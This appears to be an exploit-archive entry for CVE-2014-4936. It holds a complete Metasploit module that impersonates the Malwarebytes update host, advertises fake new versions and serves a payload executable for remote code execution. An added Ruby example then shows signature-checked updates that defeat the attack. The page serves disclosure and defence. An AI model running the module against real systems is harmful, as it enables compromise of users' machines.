Malwarebytes Anti-Malware / Anti-Exploit Update Remote Code Execution

Reported by todb, 04 Feb 2015. Type: packetstorm. Source: packetstormsecurity.com

Exploits a vulnerability in the Malwarebytes Anti-Malware and Anti-Exploit update mechanism, allowing remote code execution.

Code
```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::HttpServer

  # Paths the clients request for the version check and the installer download
  VERSION_REGEX = /\/v2\/(mbam|mbae)\/consumer\/version.chk/
  EXE_REGEX = /\/v2\/(mbam|mbae)\/consumer\/data\/(mbam|mbae)-setup-(.*)\.exe/
  # Fake "next" versions advertised to the clients
  NEXT_VERSION = { mbam: '2.0.3.1025', mbae: '1.04.1.1012' }

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Malwarebytes Anti-Malware and Anti-Exploit Update Remote Code Execution',
      'Description'    => %q{
          This module exploits a vulnerability in the update functionality of
        Malwarebytes Anti-Malware consumer before 2.0.3 and Malwarebytes
        Anti-Exploit consumer 1.03.1.1220.
        Due to the lack of proper update package validation a man-in-the-middle
        attacker could execute arbitrary code by spoofing the update server
        data-cdn.mbamupdates.com and uploading an executable. This module has
        been tested successfully with MBAM 2.0.2.1012 and MBAE 1.03.1.1220.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Yonathan Klijnsma', # Vulnerability discovery and PoC
          'Gabor Seljan',      # Metasploit module
          'todb'               # Module refactoring
        ],
      'References'     =>
        [
          [ 'CVE', '2014-4936' ],
          [ 'OSVDB', '116050' ],
          [ 'URL', 'http://blog.0x3a.com/post/104954032239/cve-2014-4936-malwarebytes-anti-malware-and' ] # Discoverer's blog
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows Universal', {} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Dec 16 2014',
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The daemon port to listen on (do not change)", 80 ]),
        OptString.new('URIPATH', [ true, "The URI to use (do not change)", "/" ])
      ], self.class)

    # Vulnerable Malwarebytes clients do not allow altering these.
    deregister_options('SSL', 'SSLVersion', 'SSLCert')
  end

  # Dispatch on the requested path: version check, installer download, or anything else
  def on_request_uri(cli, request)
    case request.uri
    when VERSION_REGEX
      serve_update_notice(cli) if set_exploit_target(cli, $1, request)
    when EXE_REGEX
      serve_exploit(cli)
    else
      vprint_status "Sending empty page for #{request.uri}"
      serve_default_response(cli)
    end
  end

  def serve_default_response(cli)
    send_response(cli, '')
  end

  # MBAM reports its installed version in the User-Agent; only offer the
  # fake update when that version is not above the one we advertise.
  def check_client_version(request)
    return false unless request['User-Agent'] =~ /base:(\d+\.\d+\.\d+\.\d+)/
    this_version = $1
    next_version = NEXT_VERSION[:mbam]
    if Gem::Version.new(next_version) >= Gem::Version.new(this_version)
      return true
    else
      print_error "Version #{this_version} of Anti-Malware isn't vulnerable, not attempting update."
      return false
    end
  end

  # Records which product is asking so serve_update_notice can answer with
  # the matching fake version. cli is needed here to send the fallback response.
  def set_exploit_target(cli, package, request)
    case package
    when /mbam/i
      if check_client_version(request)
        @client_software = ['Anti-Malware', NEXT_VERSION[:mbam]]
      else
        serve_default_response(cli)
        return false
      end
    when /mbae/i
      # We don't get identifying info from MBAE
      @client_software = ['Anti-Exploit', NEXT_VERSION[:mbae]]
    end
  end

  # Reply to version.chk with the fake version string so the client fetches the installer
  def serve_update_notice(cli)
    software, next_version = @client_software
    print_status "Updating #{software} to (fake) #{next_version}. The user may need to click 'OK'."
    send_response(cli, next_version,
      'Content-Type' => 'application/octet-stream'
    )
  end

  def serve_exploit(cli)
    print_status "Sending payload EXE..."
    send_response(cli, generate_payload_exe,
      'Content-Type' => 'application/x-msdos-program'
    )
  end

end
```
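The module's description attributes the bug to the absence of update package validation: the client fetched a version string and then an installer over plain HTTP and ran whatever came back. The following Ruby example is added here and is not part of the module, nor Malwarebytes' code; it contrasts a weak client that installs as soon as the server claims a newer version with a client that only installs a package when a signature from a pinned vendor key covers both the offered version and the package's SHA-256. The `UpdateVerifier` module, the RSA key pair and the package bytes are constructed for the demonstration; the version numbers are the ones the module uses.

```ruby
require 'openssl'
require 'digest'
require 'rubygems' # Gem::Version, as used by the module above

# Illustrative update-client checks (added example; not vendor code).
module UpdateVerifier
  module_function

  # Weak client: installs as soon as the server claims a newer version.
  # Anyone who can answer for the update host decides what is executed.
  def weak_accept?(offered_version, installed_version)
    Gem::Version.new(offered_version) > Gem::Version.new(installed_version)
  end

  # Hardened client: accept only if (a) the offer is newer than the installed
  # release and (b) a signature under the vendor's pinned key covers both the
  # version and the package hash. Binding the version into the signed data
  # stops an old, legitimately signed package from being replayed as "new".
  def verified_accept?(offered_version, package, signature, vendor_pub, installed_version)
    return false unless weak_accept?(offered_version, installed_version)
    vendor_pub.verify(OpenSSL::Digest.new('SHA256'), signature,
                      signed_blob(offered_version, package))
  rescue OpenSSL::PKey::PKeyError
    false # a malformed signature counts as a failed verification
  end

  # Canonical bytes the vendor signs for each release.
  def signed_blob(version, package)
    "#{version}\n#{Digest::SHA256.hexdigest(package)}"
  end

  # Vendor-side signing step (assumed release process for the demo).
  def sign_release(vendor_priv, version, package)
    vendor_priv.sign(OpenSSL::Digest.new('SHA256'), signed_blob(version, package))
  end
end

# --- Constructed demo data (not real Malwarebytes keys or binaries) ---
INSTALLED   = '2.0.2.1012'  # version the module reports as tested
NEXT        = '2.0.3.1025'  # version the module advertises for MBAM
VENDOR_KEY  = OpenSSL::PKey::RSA.new(2048)
VENDOR_PUB  = VENDOR_KEY.public_key        # what the client would ship pinned
GENUINE_PKG = 'MZ genuine installer bytes (constructed)'.b
SPOOFED_PKG = 'MZ bytes served by a spoofed update host (constructed)'.b
GENUINE_SIG = UpdateVerifier.sign_release(VENDOR_KEY, NEXT, GENUINE_PKG)

# Scenario 1: real release with a valid signature is accepted.
def genuine_accepted?
  UpdateVerifier.verified_accept?(NEXT, GENUINE_PKG, GENUINE_SIG, VENDOR_PUB, INSTALLED)
end

# Scenario 2: a spoofed host advertises NEXT. The weak client installs;
# the hardened client rejects because no signature under VENDOR_KEY exists
# for the spoofed bytes (reusing the genuine signature does not help).
def spoofed_accepted_by_weak_client?
  UpdateVerifier.weak_accept?(NEXT, INSTALLED)
end

def spoofed_accepted_by_hardened_client?
  UpdateVerifier.verified_accept?(NEXT, SPOOFED_PKG, GENUINE_SIG, VENDOR_PUB, INSTALLED)
end

# Scenario 3: genuine package and signature replayed under the installed
# version label is refused, both by the version rule and by the signature.
def downgrade_accepted?
  UpdateVerifier.verified_accept?(INSTALLED, GENUINE_PKG, GENUINE_SIG, VENDOR_PUB, INSTALLED)
end

if __FILE__ == $PROGRAM_NAME
  puts "genuine update accepted:              #{genuine_accepted?}"
  puts "spoofed update, weak client:          #{spoofed_accepted_by_weak_client?}"
  puts "spoofed update, hardened client:      #{spoofed_accepted_by_hardened_client?}"
  puts "replayed package as downgrade:        #{downgrade_accepted?}"
end
```

The weak path is exactly the behaviour the module relies on: being able to answer the version check and the installer download is enough. With the signature over version plus hash, answering for the update host no longer yields execution unless the vendor's private key is also compromised, which is the property transport security alone (also absent here, since the clients fetched over port 80) does not give.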


Vulners AI Score: 0.4 (Low risk). EPSS: 0.18948.